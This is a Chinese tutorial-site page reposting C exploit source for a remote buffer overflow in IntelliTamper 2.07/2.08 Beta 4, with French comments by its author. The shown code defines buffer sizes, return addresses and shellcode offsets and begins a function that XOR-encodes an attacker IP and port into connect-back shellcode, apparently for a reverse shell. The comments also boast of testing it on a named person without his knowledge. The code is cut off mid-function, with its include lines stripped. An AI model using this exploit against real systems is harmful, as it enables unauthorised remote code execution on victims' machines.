手机
当前位置:查字典教程网 >电脑 >电脑安全教程 >IntelliTamper 2.07/2.08 Beta 4 A HREF Remote Buffer Overflow Exploit
IntelliTamper 2.07/2.08 Beta 4 A HREF Remote Buffer Overflow Exploit
摘要:/********************************************************************/...

/********************************************************************/

/* [Crpt] IntelliTamper v2.07/2.08 Beta 4 sploit by kralor [Crpt] */

/********************************************************************/

/* NO MORE */

/* CONFIDENTIAL CONFIDENTIAL CONFIDENTIAL CONFIDENTIAL CONFIDENTIAL */

/* CONFIDENTIAL CONFIDENTIAL CONFIDENTIAL CONFIDENTIAL CONFIDENTIAL */

/* CONFIDENTIAL CONFIDENTIAL CONFIDENTIAL CONFIDENTIAL CONFIDENTIAL */

/* CONFIDENTIAL CONFIDENTIAL CONFIDENTIAL CONFIDENTIAL CONFIDENTIAL */

/********************************************************************/

/* Exploit testé sur Jef_FR a son insu, ca marche bien a 100% :) */

/* Jef_FR pourra vous le confirmer hihi :P */

/* Au fait c'est universel pcq si la personne utilise la v2.08beta4 */

/* ben y'a du SEH alors le premier lien qui est fait plus petit */

/* pour la v2.07 ca fera pas planter, ca sera pris en charge par le */

/* programme.. Bref que dire de plus... Si ce n'est qu'on peut p-e */

/* jumper direct sans aller a un jmp ebx, en utilisant 0x00F1FFDC */

/* j'ai remarqué que sur les deux versions une fois que ca crash */

/* (je catch l'exception meme si le prog a du SEH!) ebx pointe vers */

/* cet offset toujours le meme (~fin de notre buffer). J'ai pas */

/* regardé sur d'autres plateformes, vu que j'ai deja des ret */

/* (jmp ebx) qui vont tres bien :) c'est tout les poulets, enjoy. */

/* */

/* P.S: Faut regarder que votre IP xoré par 0x98 donne pas un bad */

/* opcode du genre < > " r n ... C'est pas sorcier a coder :) */

/********************************************************************/

/* informations: , irc undernet #coromputer */

/********************************************************************/

#include

#include

#include

#ifdef _WIN32

#include

#pragma comment(lib, "ws2_32")

#else

#include

#endif

#define SIZEOF 14448 /* IntelliTamper v2.08 Beta 4 AND v2.07

* for v2.07 it isn't this size 'cause

* there's a *missing* in RET_ADDR2

* so it cuts the size.

*/

#define SCOFFSET 10000 /* IntelliTamper v2.08 Beta 4 */

#define RET_POS SIZEOF-4

#define RET_ADDR 0x004368C4

#define SCOFFSET2 100 /* IntelliTamper v2.07 */

#define RET_POS2 6832

#define RET_ADDR2 0x00437224

#define u_short unsigned short

#define u_char unsigned char

#define HOP 0xd9 /* host opcode */

#define POP 0xda /* port opcode */

#define BEGIN "rnrn"

#define END "rn"

int set_sc(char *host,unsigned long port, char *sc)

{

unsigned long ip,p;

unsigned int i;

ip=inet_addr(host)^0x98989898;

p=htons((u_short)port);

p=p

【IntelliTamper 2.07/2.08 Beta 4 A HREF Remote Buffer Overflow Exploit】相关文章:

NCTsoft AudFile.dll ActiveX Control Remote Buffer Overflow Exploit

BIND 9.x Remote DNS Cache Poisoning Flaw Exploit (c)

Web 安全之Cookie劫持详细介绍

IntelliTamper 2.07 (map file) Local Arbitrary Code Execution Exploit (pl)

BIND 9.x Remote DNS Cache Poisoning Flaw Exploit (py)

教你8种方法 轻松远离垃圾邮件

WinRemotePC Full Lite 2008 r.2server Denial of Service Exploit

你所不知道的XML安全

设置Win8系统“家庭安全”的方法

终端技巧 终端机常见绕过沙盘方法

精品推荐
分类导航